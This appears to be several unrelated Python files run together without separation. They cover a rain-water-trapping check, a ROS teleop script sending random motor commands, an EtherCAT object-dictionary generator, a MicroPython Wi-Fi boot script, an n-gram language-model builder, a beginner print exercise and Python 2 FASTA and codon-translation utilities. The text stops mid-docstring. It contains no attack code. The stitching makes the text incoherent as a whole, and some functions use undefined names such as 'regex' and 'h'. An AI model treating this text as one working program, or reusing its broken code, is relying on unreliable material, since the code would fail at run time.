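# For height = [2, 0, 2] the single gap fills to the level of the shorter wall, trapping
# 2 units; for [4, 2, 0, 3, 2, 5] the trapped amounts per index are 2 + 4 + 1 + 2 = 9.
# Small check against the Solution class above:
s = Solution()
print(s.trap([2, 0, 2]))           # 2
print(s.trap([4, 2, 0, 3, 2, 5]))  # 9
print(s.trap([]))                  # 0 (empty-input guard)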
#!/usr/bin/env python

# simple tele operation, intended to translate key presses, e.g. 'w', into motorhat
# node messages with a simple interpolation ramp between the current and target values.
# the keyboard handling is currently commented out, so this version just publishes a
# random four-motor command once per second (a smoke test of the hat_cmd topic).

#import readchar
import sys, select, tty, termios
import rospy
from std_msgs.msg import Int16MultiArray
import numpy as np

# setup a ros publisher and a method to send msgs to it.
publisher = rospy.Publisher('/robotZero/hat_cmd', Int16MultiArray, queue_size=1, latch=True)
rospy.init_node("teleop")

def pub(values):
    values = [-v for v in values]  # hack: invert the sign before publishing
    rospy.loginfo("publish [%s]" % values)
    msg = Int16MultiArray()
    msg.data = values
    publisher.publish(msg)

# set cbreak on stdin (recall original attr to restore later)
# this is required for the polling select on stdin.
original_t_attr = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin.fileno())

rate = rospy.Rate(1)
while not rospy.is_shutdown():
    # random command per motor: randint gives 0..6, shifted to -3..3, scaled to -150..150
    d = np.random.randint(0, 7, size=4)
    d -= 3
    d *= 50
    pub(d)
    # spin ros
    rate.sleep()

# pub stop and restore terminal settings
pub([0]*4)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, original_t_attr)
from PDOMapping import GeneratePdoMapping def GeneratePdoMappingString(listSlaveInfo,rxtx,strEntryPrefix,strPdoObjPrefix): dictPdoMapping = GeneratePdoMapping(listSlaveInfo,rxtx,strEntryPrefix,strPdoObjPrefix) strPdoMapping = "" strAppObjDic = "" #Generate PDO Mapping Object for itemPdoMapping in dictPdoMapping.iteritems(): #Generate Remark strRemark = "/****************************************************\n" strRemark = strRemark+"** Object"+itemPdoMapping[0]+'\n' strRemark = strRemark+"****************************************************/\n" #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+itemPdoMapping[0] strEntryDesc = strEntryDesc+'[] = {\n' strEntryDesc = strEntryDesc+'\t{DEFTYPE_UNSIGNED16, 0x10, ACCESS_READ },\n' strEntryDesc = strEntryDesc+'\t{DEFTYPE_UNSIGNED32, 0x20, ACCESS_READ},\n'*len(itemPdoMapping[1]) strEntryDesc = strEntryDesc+'};' #Generate Obj name if rxtx == "rx": strObjName = 'OBJCONST UCHAR OBJMEM aName'+itemPdoMapping[0]+'[] = "Output Mapping ' elif rxtx == "tx": strObjName = 'OBJCONST UCHAR OBJMEM aName'+itemPdoMapping[0]+'[] = "Input Mapping ' strObjName = strObjName+itemPdoMapping[0][4:6] strObjName = strObjName+'\\000\\377";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" strVarDecl = strVarDecl+"\tUINT16 u16SubIndex0;\n" strVarDecl = strVarDecl+"\tUINT32 aEntries["+str(len(itemPdoMapping[1]))+"];\n" strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+itemPdoMapping[0]+';\n' strVarDecl = strVarDecl+"TOBJ"+itemPdoMapping[0]+" Obj"+itemPdoMapping[0]+' __attribute__ ((aligned (2)))\n={' strVarDecl = strVarDecl+str(len(itemPdoMapping[1]))+', {' for dictEntry in itemPdoMapping[1]: strVarDecl = strVarDecl+str(dictEntry['Index'])+("%02d"%dictEntry['SI'])+\ ("%02x"%dictEntry['Length'])+',' strVarDecl = strVarDecl+'}};' strPdoMapping = strPdoMapping+strRemark+strVarDecl+'\n'+strEntryDesc+'\n'+strObjName+'\n' #Generate AppObjDic of PDO mapping strAppObjDic = strAppObjDic+"\t{NULL,NULL,"+itemPdoMapping[0] strAppObjDic = strAppObjDic+",{DEFTYPE_PDOMAPPING, 1 | (OBJCODE_ARR << 8)}, asEntryDesc" strAppObjDic = strAppObjDic+itemPdoMapping[0]+', aName'+itemPdoMapping[0]+', &Obj'+itemPdoMapping[0] strAppObjDic = strAppObjDic+', NULL, NULL, 0x0000 },\n' #Generate PDO Assignment #Generate Remark strRemark = "/****************************************************\n" if rxtx == "rx": strRemark = strRemark+"** Object0x1C12\n" elif rxtx == "tx": strRemark = strRemark+"** Object0x1C13\n" strRemark = strRemark+"****************************************************/\n" #Generate Obj name if rxtx == "rx": strPdoAssignIndex = '0x1C12' strPdoAssignVarName = 'sRxPDOassign' elif rxtx == "tx": strPdoAssignIndex = '0x1C13' strPdoAssignVarName = 'sTxPDOassign' strObjName = 'OBJCONST UCHAR OBJMEM aName'+strPdoAssignIndex+'[] = "'+rxtx.upper()+'PDO assign";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" strVarDecl = strVarDecl+"\tUINT16 u16SubIndex0;\n" strVarDecl = strVarDecl+"\tUINT16 aEntries["+str(len(dictPdoMapping))+"];\n" strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+strPdoAssignIndex+';\n' strVarDecl = strVarDecl+"TOBJ"+strPdoAssignIndex+' '+strPdoAssignVarName+' __attribute__ ((aligned (2))) \n={' strVarDecl = strVarDecl+str(len(dictPdoMapping))+', {' strVarDecl = strVarDecl+','.join(dictPdoMapping.keys()) strVarDecl = strVarDecl+'}};' strPdoMapping = 
strPdoMapping+strRemark+strVarDecl+'\n'+strObjName+'\n' #Generate AppObjDic of PDO assignment strAppObjDic = strAppObjDic+"\t{NULL,NULL,"+strPdoAssignIndex strAppObjDic = strAppObjDic+",{DEFTYPE_UNSIGNED16, "+str(len(dictPdoMapping)) strAppObjDic = strAppObjDic+" | (OBJCODE_ARR << 8)}, asPDOAssignEntryDesc" strAppObjDic = strAppObjDic+', aName'+strPdoAssignIndex+', &'+strPdoAssignVarName strAppObjDic = strAppObjDic+', NULL, NULL, 0x0000 },\n' return (strPdoMapping,strAppObjDic) def GenerateTxPdoMappingString(listSlaveInfo): return GeneratePdoMappingString(listSlaveInfo,"tx","0x6","0x1A") def GenerateRxPdoMappingString(listSlaveInfo): return GeneratePdoMappingString(listSlaveInfo,"rx","0x7","0x16") def ODGenerator(listSlaveInfo): from EthercatType import dictEthercatType, dictAccessType, dictPdoDirType strDecl = "" #Generate PdoMappingString (strDeclTxPdo,strAppObjDicTxPdo) = GenerateTxPdoMappingString(listSlaveInfo); (strDeclRxPdo,strAppObjDicRxPdo) = GenerateRxPdoMappingString(listSlaveInfo); strDecl = strDecl+strDeclRxPdo; strDecl = strDecl+strDeclTxPdo; strAppObjDic = "\n/****************************************************\n" strAppObjDic = strAppObjDic+"** ApplicationObjDic\n" strAppObjDic = strAppObjDic+"****************************************************/\n" strAppObjDic = strAppObjDic+"TOBJECT OBJMEM ApplicationObjDic[] = {\n" strAppObjDic = strAppObjDic+strAppObjDicTxPdo strAppObjDic = strAppObjDic+strAppObjDicRxPdo for dictItem in listSlaveInfo: if dictItem['ObjectCode'] == "VARIABLE": dictEntry = dictItem['Entry'][0] #Generate var declaration strVarDecl = dictEthercatType[dictEntry['DataType']][0] strVarDecl = strVarDecl+' '+"Obj"+dictItem['Index']+' __attribute__ ((aligned (2)))= ' strVarDecl = strVarDecl+str(dictEntry['Default'])+';' #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+dictItem['Index']+ ' = {' strEntryDesc = strEntryDesc+dictEthercatType[dictEntry['DataType']][1] strEntryDesc = strEntryDesc+', '+str(dictEthercatType[dictEntry['DataType']][2])+', ' strEntryDesc = strEntryDesc+dictAccessType[dictEntry['Access']]+'|' strEntryDesc = strEntryDesc+dictPdoDirType[dictEntry['PdoDirection']] strEntryDesc = strEntryDesc+'};' #Generate Obj name strObjName = 'OBJCONST UCHAR OBJMEM aName'+dictItem['Index']+'[] = "'+dictEntry['Name']+'";' elif dictItem['ObjectCode'] == "RECORD": #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+dictItem['Index'] strEntryDesc = strEntryDesc+'['+str(len(dictItem['Entry']))+'] = {\n' for dictEntry in dictItem['Entry']: strEntryDesc = strEntryDesc+'\t{' strEntryDesc = strEntryDesc+dictEthercatType[dictEntry['DataType']][1] strEntryDesc = strEntryDesc+', '+str(dictEthercatType[dictEntry['DataType']][2])+', ' strEntryDesc = strEntryDesc+dictAccessType[dictEntry['Access']]+'|' strEntryDesc = strEntryDesc+dictPdoDirType[dictEntry['PdoDirection']] strEntryDesc = strEntryDesc+'},\n' strEntryDesc = strEntryDesc+'};' #Generate Obj name strObjName = 'OBJCONST UCHAR OBJMEM aName'+dictItem['Index']+'[] = "' for dictEntry in dictItem['Entry']: strObjName = strObjName+dictEntry['Name']+'\\000' strObjName = strObjName+'\\377";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" bLastBitField = 0 for dictEntry in dictItem['Entry']: strVarDecl = strVarDecl+"\t"+ dictEthercatType[dictEntry['DataType']][0] strVarDecl = strVarDecl+' '+"SubIndex"+str(dictEntry['SI']) if dictEthercatType[dictEntry['DataType']][2]<16: strVarDecl = 
strVarDecl+':'+str(dictEthercatType[dictEntry['DataType']][2]) if bLastBitField == 0: strVarDecl = strVarDecl+' __attribute__ ((aligned (2)))' bLastBitField = 1 else: strVarDecl = strVarDecl+' __attribute__ ((aligned (2)))' bLastBitField = 0 strVarDecl = strVarDecl+';\n' strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+';\n' strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+" Obj"+dictItem['Index']+'\n={' for dictEntry in dictItem['Entry']: strVarDecl = strVarDecl+str(dictEntry['Default'])+',' strVarDecl = strVarDecl+'};' elif dictItem['ObjectCode'] == "ARRAY": #Generate entry description strEntryDesc = 'OBJCONST TSDOINFOENTRYDESC OBJMEM '+'asEntryDesc'+dictItem['Index'] strEntryDesc = strEntryDesc+'['+str(len(dictItem['Entry']))+'] = {\n' for dictEntry in dictItem['Entry']: strEntryDesc = strEntryDesc+'\t{' strEntryDesc = strEntryDesc+dictEthercatType[dictEntry['DataType']][1] strEntryDesc = strEntryDesc+', '+str(dictEthercatType[dictEntry['DataType']][2])+', ' strEntryDesc = strEntryDesc+dictAccessType[dictEntry['Access']]+'|' strEntryDesc = strEntryDesc+dictPdoDirType[dictEntry['PdoDirection']] strEntryDesc = strEntryDesc+'},\n' strEntryDesc = strEntryDesc+'};' #Generate Obj name strObjName = 'OBJCONST UCHAR OBJMEM aName'+dictItem['Index']+'[] = "' strObjName = strObjName+dictItem['Entry'][0]['Name']+'";' #Generate var declaration strVarDecl = "typedef struct OBJ_STRUCT_PACKED_START {\n" strVarDecl = strVarDecl+"\t"+ dictEthercatType[dictItem['Entry'][0]['DataType']][0] strVarDecl = strVarDecl+' '+"SubIndex0"+' __attribute__ ((aligned (2)));\n' for intSI in range(1,int(dictItem['Entry'][0]['Default'])+1): strVarDecl = strVarDecl+"\t"+ dictEthercatType[dictItem['Entry'][1]['DataType']][0]\ +' '+"SubIndex"+str(intSI) if dictEthercatType[dictItem['Entry'][1]['DataType']][2]<16: strVarDecl = strVarDecl+':'+str(dictEthercatType[dictItem['Entry'][1]['DataType']][2]) if intSI==1 or dictEthercatType[dictItem['Entry'][1]['DataType']][2]>=16: strVarDecl = strVarDecl+' __attribute__ ((aligned (2)))' strVarDecl = strVarDecl+';\n' strVarDecl = strVarDecl+"} OBJ_STRUCT_PACKED_END\n" strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+';\n' strVarDecl = strVarDecl+"TOBJ"+dictItem['Index']+" Obj"+dictItem['Index']+'\n={' strVarDecl = strVarDecl+str(dictItem['Entry'][0]['Default'])+',' strVarDecl = strVarDecl+(str(dictItem['Entry'][1]['Default'])+',')*int(dictItem['Entry'][0]['Default']) strVarDecl = strVarDecl+'};' #Generate Remark strRemark = "/****************************************************\n" strRemark = strRemark+"** Object"+dictItem['Index']+'\n' strRemark = strRemark+"****************************************************/\n" strEntry = strRemark+strVarDecl+'\n'+strEntryDesc+'\n'+strObjName+'\n' #Append to declaration string strDecl = strDecl+strEntry #Generate ApplicationObjDic Item strObjDicItem = "\t{NULL, NULL, "+dictItem['Index']+', ' if dictItem['ObjectCode'] == "VARIABLE": strObjDicItem = strObjDicItem+'{'+dictEthercatType[dictItem['Entry'][0]['DataType']][1] strObjDicItem = strObjDicItem+', 0|(OBJCODE_VAR<<8)}, '+'&' elif dictItem['ObjectCode'] == "RECORD": strObjDicItem = strObjDicItem+'{DEFTYPE_RECORD' strObjDicItem = strObjDicItem+', '+str(len(dictItem['Entry'])-1)+'|(OBJCODE_REC<<8)}, ' elif dictItem['ObjectCode'] == "ARRAY": strObjDicItem = strObjDicItem+'{DEFTYPE_RECORD' strObjDicItem = strObjDicItem+', '+str(dictItem['Entry'][0]['Default'])+'|(OBJCODE_ARR<<8)}, ' strObjDicItem = strObjDicItem+'asEntryDesc'+dictItem['Index']+', ' 
strObjDicItem = strObjDicItem+'aName'+dictItem['Index']+', ' strObjDicItem = strObjDicItem+'&Obj'+dictItem['Index']+', ' strObjDicItem = strObjDicItem+'NULL , NULL , 0x0000 },\n' strAppObjDic = strAppObjDic+strObjDicItem strAppObjDic = strAppObjDic+"\t{NULL,NULL, 0xFFFF, {0, 0}, NULL, NULL, NULL, NULL}};\n" return strDecl+strAppObjDic
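A hedged sketch of how ODGenerator above might be invoked. The dict keys are inferred from what the generator reads for a VARIABLE object; the exact values accepted by the EthercatType lookup tables and by GeneratePdoMapping are assumptions.

# Hedged usage sketch (not from the original project), assumed to sit at the
# bottom of the module above. Whether 'UNSIGNED16'/'rw'/'TxPdo' are valid keys
# of dictEthercatType/dictAccessType/dictPdoDirType is an assumption.
if __name__ == "__main__":
    example_slave_info = [
        {
            'Index': '0x8000',
            'ObjectCode': 'VARIABLE',
            'Entry': [{
                'SI': 0,
                'Name': 'DeviceSetting',
                'DataType': 'UNSIGNED16',   # assumed lookup key
                'Access': 'rw',             # assumed lookup key
                'PdoDirection': 'TxPdo',    # assumed lookup key
                'Default': 0,
            }],
        },
    ]
    # Write the generated object-dictionary C source to a file.
    with open('objdict.c', 'w') as handle:
        handle.write(ODGenerator(example_slave_info))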
# This file is executed on every boot (including wake-boot from deepsleep) #import esp #esp.osdebug(None) import gc import webrepl import network from config import ESSID, PASSWORD webrepl.start() gc.collect() def connect(): sta_if = network.WLAN(network.STA_IF) if not sta_if.isconnected(): print('Connecting to network...') sta_if.active(True) sta_if.connect(ESSID, PASSWORD) while not sta_if.isconnected(): pass print('Network config:', sta_if.ifconfig()) connect()
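boot.py above imports its Wi-Fi credentials from a config module; a minimal placeholder version might look like this (the values are placeholders, not real credentials).

# config.py -- hedged placeholder companion for the boot script above.
ESSID = "my-network"        # placeholder SSID
PASSWORD = "change-me"      # placeholder Wi-Fi password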
from nltk.tokenize import RegexpTokenizer from nltk.tokenize import word_tokenize from nltk.corpus import stopwords from nltk.tokenize import RegexpTokenizer from collections import Counter import pickle import os task = [ '20_newsgroups/rec.sport.baseball', '20_newsgroups/rec.motorcycles' ] def fetchFromPickle(pickleFile): file = open(pickleFile,'rb') pickleData = pickle.load(file) file.close() return pickleData def saveInPickle(data, pickleFile): file = open(pickleFile,"wb") pickle.dump(data,file) file.close() def generateTrigramProb(trigramFreq, bigramFreq, ksmooth,vocSize): for w1 in trigramFreq: for w2 in trigramFreq[w1]: for w3 in trigramFreq[w1][w2]: trigramFreq[w1][w2][w3]=float(trigramFreq[w1][w2][w3]+ksmooth)/float(bigramFreq[w1][w2]+ksmooth*vocSize) return trigramFreq def generateBigramProb(bigramFreq, unigramFreq, ksmooth,vocSize): for w1 in bigramFreq: for w2 in bigramFreq[w1]: bigramFreq[w1][w2]=float(bigramFreq[w1][w2]+ksmooth)/float(unigramFreq[w1]+ksmooth*vocSize) return bigramFreq def generateUnigramProb(unigramFreq, totalFreq, ksmooth,vocSize): for w1 in unigramFreq: unigramFreq[w1] = float(unigramFreq[w1]+ksmooth)/float(totalFreq+vocSize*ksmooth) return unigramFreq def generateUnigram(data): dict = {} for word in data: dict[word] = 0 for word in data: dict[word]+=1 return dict def generateBigram(data): dix = {} for i, val in enumerate(data): if(i<(len(data)-1)): dix[data[i]] = {} # print(data[i-1]) # print(dix) # print(dix) for i, val in enumerate(data): if(i<(len(data)-1)): dix[data[i]][data[i+1]] = 0 for i, val in enumerate(data): if(i<(len(data)-1)): dix[data[i]][data[i+1]]+=1 # dict[data[i]][data[i+1]]+=1 return dix def generateTrigram(data): dix = {} for i, val in enumerate(data): dix[data[i]] = {} # print(data[i-1]) # print(dix) # print(dix) for i, val in enumerate(data): if i < (len(data)-2): dix[data[i]][data[i+1]] = {} for i, val in enumerate(data): if i < (len(data)-2): dix[data[i]][data[i+1]][data[i+2]] = 0 for i, val in enumerate(data): if i < (len(data)-2): dix[data[i]][data[i+1]][data[i+2]]+=1 # dict[data[i]][data[i+1]]+=1 return dix def removeStopWords(words): filteredWords = [] stop_words=stopwords.words('english') for word in words: if word not in stop_words: filteredWords.append(word) return filteredWords def processDataSet(path): files=[] for r, d, f in os.walk(path): for file in f: files.append(os.path.join(r, file)) data = [] for file in files: file = open(file, "r", encoding = "ISO-8859-1") fileContent=file.read() fileContent=fileContent.lower() if (fileContent.find("lines:") != -1): metadata,fileContent = fileContent.split('lines:', 1) tokenizer=RegexpTokenizer(r'([A-Za-z0-9]+)') dataList=tokenizer.tokenize(fileContent) # print(dataList) data=data+dataList # print(data) return data count = 1 ksmooth = 1 for path in task: list = processDataSet(path) # list = removeStopWords(list) # print(len(list)) unigramFreq = generateUnigram(list) saveInPickle(unigramFreq, "task-"+str(count)+"-unigram-freq.pickle") bigramFreq=generateBigram(list) saveInPickle(bigramFreq, "task-"+str(count)+"-bigram-freq.pickle") trigramFreq=generateTrigram(list) saveInPickle(trigramFreq, "task-"+str(count)+"-trigram-freq.pickle") totalFreq = len(list) vocSize = len(unigramFreq) trigramProb = generateTrigramProb(trigramFreq, bigramFreq, ksmooth, vocSize) saveInPickle(trigramProb, "add-1-task-"+str(count)+"-trigram.pickle") bigramProb = generateBigramProb(bigramFreq, unigramFreq, ksmooth, vocSize) saveInPickle(bigramProb, "add-1-task-"+str(count)+"-bigram.pickle") unigramProb = 
generateUnigramProb(unigramFreq, totalFreq, ksmooth, vocSize) saveInPickle(unigramProb, "add-1-task-"+str(count)+"-unigram.pickle") count+=1 print(unigramProb)
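A hedged sketch of how the pickled add-1 probabilities might be queried afterwards: score a token sequence against the trigram table, falling back to a floor probability for unseen trigrams. The floor value is an assumption, since the script above only stores probabilities for observed n-grams.

import math
import pickle

def load_pickle(path):
    # Mirrors fetchFromPickle above, duplicated so this sketch is self-contained.
    with open(path, "rb") as f:
        return pickle.load(f)

def trigram_log_prob(tokens, trigram_prob, floor=1e-8):
    # Sum log P(w3 | w1, w2) over the sequence; unseen trigrams get a floor
    # probability because the add-1 mass for unseen events is not stored above.
    logp = 0.0
    for w1, w2, w3 in zip(tokens, tokens[1:], tokens[2:]):
        p = trigram_prob.get(w1, {}).get(w2, {}).get(w3, floor)
        logp += math.log(p)
    return logp

# Example (assumes the pickle produced for task 1 exists on disk):
# trigram_prob = load_pickle("add-1-task-1-trigram.pickle")
# print(trigram_log_prob("the game was played".split(), trigram_prob))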
import sys

# Append the parent directory so the 'implementations' package import below resolves.
sys.path.append('..')
from implementations.magicians import magicians

for magician in magicians:
    print(magician.title() + ", that was a great trick!")
    print("I can't wait to see your next trick, " + magician.title() + ".\n")

print("Thank you, everyone. That was a great magic show!")
import sys import re import math import random def convert_fasta (lines): blocks = [] sequence = '' for i in lines: if i[0] == '$': # skip h info continue elif i[0] == '>' or i[0] == '#': if len(sequence) > 0: blocks.append([h,sequence]) sequence = '' # reset containers h = i.strip('\n')[1:] else: h = i.strip('\n')[1:] else: sequence += i.strip('\n') try: blocks.append([h,sequence]) # handle last entry except: print lines raise return blocks def parse_fasta (handle): """ Parse open file as FASTA, return dictionary of headers and sequences as key-value pairs. """ res = {} sequence = '' for i in handle: if i[0] == '$': # skip h info continue elif i[0] == '>' or i[0] == '#': if len(sequence) > 0: res.update({h: sequence}) sequence = '' # reset containers h = i.strip('\n')[1:] else: h = i.strip('\n')[1:] else: sequence += i.strip('\n').upper() res.update({h: sequence}) return res def iter_fasta (handle): """ Parse open file as FASTA. Returns a generator of handle, sequence tuples. """ sequence = '' for i in handle: if i[0] == '$': # skip h info continue elif i[0] == '>' or i[0] == '#': if len(sequence) > 0: yield h, sequence sequence = '' # reset containers h = i.strip('\n')[1:] else: sequence += i.strip('\n').upper() yield h, sequence def fasta2phylip (fasta, handle): ntaxa = len(fasta) nsites = len(fasta[0][1]) handle.write(str(ntaxa)+' '+str(nsites)+'\n') for row in fasta: # phylip format uses space delimiters header = regex.sub('',row[0]).replace(' ','_') handle.write(header+' '+row[1]+'\n') def convert_phylip (lines): """ Convert line input from Phylip format file into Python list object. """ res = [] try: ntaxa, nsites = lines[0].strip('\n').split() except: print lines[0] raise if len(lines) != int(ntaxa) + 1: raise AssertionError ('Number of taxa does not equal header') for line in lines[1:]: header, seq = line.strip('\n').split() res.append( [header, seq] ) return res complement_dict = {'A':'T', 'C':'G', 'G':'C', 'T':'A', 'W':'S', 'R':'Y', 'K':'M', 'Y':'R', 'S':'W', 'M':'K', 'B':'V', 'D':'H', 'H':'D', 'V':'B', '*':'*', 'N':'N', '-':'-'} def reverse_and_complement(seq): rseq = seq[::-1] rcseq = '' for i in rseq: # reverse order rcseq += complement_dict[i] return rcseq codon_dict = {'TTT':'F', 'TTC':'F', 'TTA':'L', 'TTG':'L', 'TCT':'S', 'TCC':'S', 'TCA':'S', 'TCG':'S', 'TAT':'Y', 'TAC':'Y', 'TAA':'*', 'TAG':'*', 'TGT':'C', 'TGC':'C', 'TGA':'*', 'TGG':'W', 'CTT':'L', 'CTC':'L', 'CTA':'L', 'CTG':'L', 'CCT':'P', 'CCC':'P', 'CCA':'P', 'CCG':'P', 'CAT':'H', 'CAC':'H', 'CAA':'Q', 'CAG':'Q', 'CGT':'R', 'CGC':'R', 'CGA':'R', 'CGG':'R', 'ATT':'I', 'ATC':'I', 'ATA':'I', 'ATG':'M', 'ACT':'T', 'ACC':'T', 'ACA':'T', 'ACG':'T', 'AAT':'N', 'AAC':'N', 'AAA':'K', 'AAG':'K', 'AGT':'S', 'AGC':'S', 'AGA':'R', 'AGG':'R', 'GTT':'V', 'GTC':'V', 'GTA':'V', 'GTG':'V', 'GCT':'A', 'GCC':'A', 'GCA':'A', 'GCG':'A', 'GAT':'D', 'GAC':'D', 'GAA':'E', 'GAG':'E', 'GGT':'G', 'GGC':'G', 'GGA':'G', 'GGG':'G', '---':'-', 'XXX':'?'} mixture_regex = re.compile('[WRKYSMBDHVN-]') mixture_dict = {'W':'AT', 'R':'AG', 'K':'GT', 'Y':'CT', 'S':'CG', 'M':'AC', 'V':'AGC', 'H':'ATC', 'D':'ATG', 'B':'TGC', 'N':'ATGC', '-':'ATGC'} #mixture_dict_2 = [ (set(v), k) for k, v in mixture_dict.iteritems() ] ambig_dict = dict(("".join(sorted(v)), k) for k, v in mixture_dict.iteritems()) def translate_nuc (seq, offset, resolve=False, return_list=False): """ Translate nucleotide sequence into amino acid sequence. offset by X shifts sequence to the right by X bases Synonymous nucleotide mixtures are resolved to the corresponding residue. 
Nonsynonymous nucleotide mixtures are encoded with '?' """ seq = '-'*offset + seq aa_list = [] aa_seq = '' # use to align against reference, for resolving indels # loop over codon sites in nucleotide sequence for codon_site in xrange(0, len(seq), 3): codon = seq[codon_site:codon_site+3] if len(codon) < 3: break # note that we're willing to handle a single missing nucleotide as an ambiguity if codon.count('-') > 1 or '?' in codon: if codon == '---': # don't bother to translate incomplete codons aa_seq += '-' aa_list.append(['-']) else: aa_seq += '?' aa_list.append(['?']) continue # look for nucleotide mixtures in codon, resolve to alternative codons if found num_mixtures = len(mixture_regex.findall(codon)) if num_mixtures == 0: aa = codon_dict[codon] aa_seq += aa aa_list.append([aa]) elif num_mixtures == 1: resolved_AAs = [] for pos in range(3): if codon[pos] in mixture_dict.keys(): for r in mixture_dict[codon[pos]]: rcodon = codon[0:pos] + r + codon[(pos+1):] if codon_dict[rcodon] not in resolved_AAs: resolved_AAs.append(codon_dict[rcodon]) aa_list.append(resolved_AAs) if len(resolved_AAs) > 1: if resolve: # for purposes of aligning AA sequences # it is better to have one of the resolutions # than a completely ambiguous '?' aa_seq += resolved_AAs[0] else: aa_seq += '?' else: aa_seq += resolved_AAs[0] else: aa_seq += '?' aa_list.append(['?']) if return_list: return aa_list return aa_seq # ===================================== # when codon sequence contains non-synonymous mixtures (indicated # by '?' in translated sequence) then expand into all # possible residues in a list-object on which scores are applied def expand (sd): for h in sd.iterkeys(): aaseq = sd[h]['clipped_aa'] nucseq = sd[h]['clipped_nuc'] sd[h].update({'aa_list':expand_single (aaseq, nucseq)}) return sd def expand_single (aaseq, nucseq): aa_list = [] for pos in range(len(aaseq)): if aaseq[pos] == '?': codon = nucseq[(3*pos):(3*(pos+1))] # leave in-frame codon gaps alone if codon == '---': aa_list.append('-') continue if len(codon) < 3: print 'WARNING: partial codon "'+codon+'" detected in sequence ' + nucseq + ' at codon ' + str(pos) print 'query = ' + aaseq print 'h = ' + h sys.exit() rcodons = [codon] while 1: ok_to_stop = True for rcodon in rcodons: for pos in range(3): if rcodon[pos] in mixture_dict.keys(): rcodons.remove(rcodon) for r in mixture_dict[rcodon[pos]]: next_rcodon = rcodon[0:pos] + r + rcodon[(pos+1):] if next_rcodon not in rcodons: rcodons.append(next_rcodon) ok_to_stop = False break # go to next item in list if ok_to_stop: break resolved_AAs = [] for rcodon in rcodons: if codon_dict[rcodon] not in resolved_AAs: resolved_AAs.append(codon_dict[rcodon]) if codon.count('-') > 0: aa_list.append('?') else: aa_list.append(resolved_AAs) """ if '-' in codon: if len(resolved_AAs) > 1: # this will have to be imputed # currently '?' 
contributes no score aa_list.append('?') else: aa_list.append(resolved_AAs[0]) else: aa_list.append(resolved_AAs) """ else: aa_list.append(aaseq[pos]) return aa_list # ======================================================================= sg_regex = re.compile('[ACGT][N-][ACGT]') def expand_clonal (sd): for h in sd.iterkeys(): query_v3 = sd[h]['clipped_aa'] codon_v3 = sd[h]['clipped_nuc'] new_seq = '' for pos in range(len(query_v3)): if query_v3[pos] == '?': codon = codon_v3[(3*pos):(3*(pos+1))] # leave in-frame codon gaps alone if codon == '---': new_seq += '-' continue if len(codon) < 3: print 'WARNING: partial codon "'+codon+'" detected in sequence ' + codon_v3 + ' at codon ' + str(pos) print 'query = ' + query_v3 print 'h = ' + h sys.exit() rcodons = [codon] while 1: ok_to_stop = True for rcodon in rcodons: for pos in range(3): if rcodon[pos] in mixture_dict.keys(): rcodons.remove(rcodon) for r in mixture_dict[rcodon[pos]]: next_rcodon = rcodon[0:pos] + r + rcodon[(pos+1):] if next_rcodon not in rcodons: rcodons.append(next_rcodon) ok_to_stop = False break # go to next item in list if ok_to_stop: break resolved_AAs = [] for rcodon in rcodons: if codon_dict[rcodon] not in resolved_AAs: resolved_AAs.append(codon_dict[rcodon]) if len(resolved_AAs) > 1: new_seq += '?' else: new_seq += resolved_AAs[0] else: new_seq += query_v3[pos] sd[h].update({'clipped_aa':new_seq}) return sd def patch_gaps (sd): # For clonal sequences (454), singleton 'N's or '-'s are common. # Rather than ignore these incomplete codons, it is better to resolve # them by one of the following procedures: # - if the gap is at a synonymous site, then simply replace the # ambiguous character '?' with that residue # - if the gap is at a nonsynonymous site, then resolve it into the # majority nucleotide and the corresponding residue # I'm not sure this is the best approach... # generate nucleotide frequency vector seqlen = len(sd.values()[0]['clipped_nuc']) nucfreqs = dict([(x,{'A':0, 'C':0, 'G':0, 'T':0}) for x in range(seqlen)]) for h in sd.iterkeys(): nucseq = sd[h]['clipped_nuc'] for pos in range(seqlen): try: nucfreqs[pos][nucseq[pos]] += 1 except: pass # generate majority consensus sequence major_seq = '' for pos in range(seqlen): major_seq += nucfreqs[pos].keys()[nucfreqs[pos].values().index(max(nucfreqs[pos].values()))] for h in sd.iterkeys(): nucseq = sd[h]['clipped_nuc'] if not sg_regex.findall(nucseq): continue nslist = [x for x in nucseq] # edit a.a. sequence based on resolution of broken codon bad_seq = False for sg in sg_regex.finditer(nucseq): nucpos = sg.start()+1 try: nslist[nucpos] = major_seq[nucpos] except: # this is usually caused by a frameshift in the # original sequence that is not handled properly by # the align() function. bad_seq = True break if bad_seq: continue nucseq = ''.join(nslist) sd[h]['clipped_nuc'] = nucseq sd[h]['clipped_aa'] = translate_nuc(nucseq, 0) return sd # ======================================================================= def aalist_to_str (aa_list): res = '' for pos in range(len(aa_list)): if type(aa_list[pos]) == list: res += '[' for char in aa_list[pos]: res += char res += ']' else: res += aa_list[pos] return res # ======================================================================= def gaps2ambig (nucseq): """ Convert all gap characters that are not a proper codon deletion into an ambiguous character. Meant to operate on a nucleotide sequence that is in reading frame. 
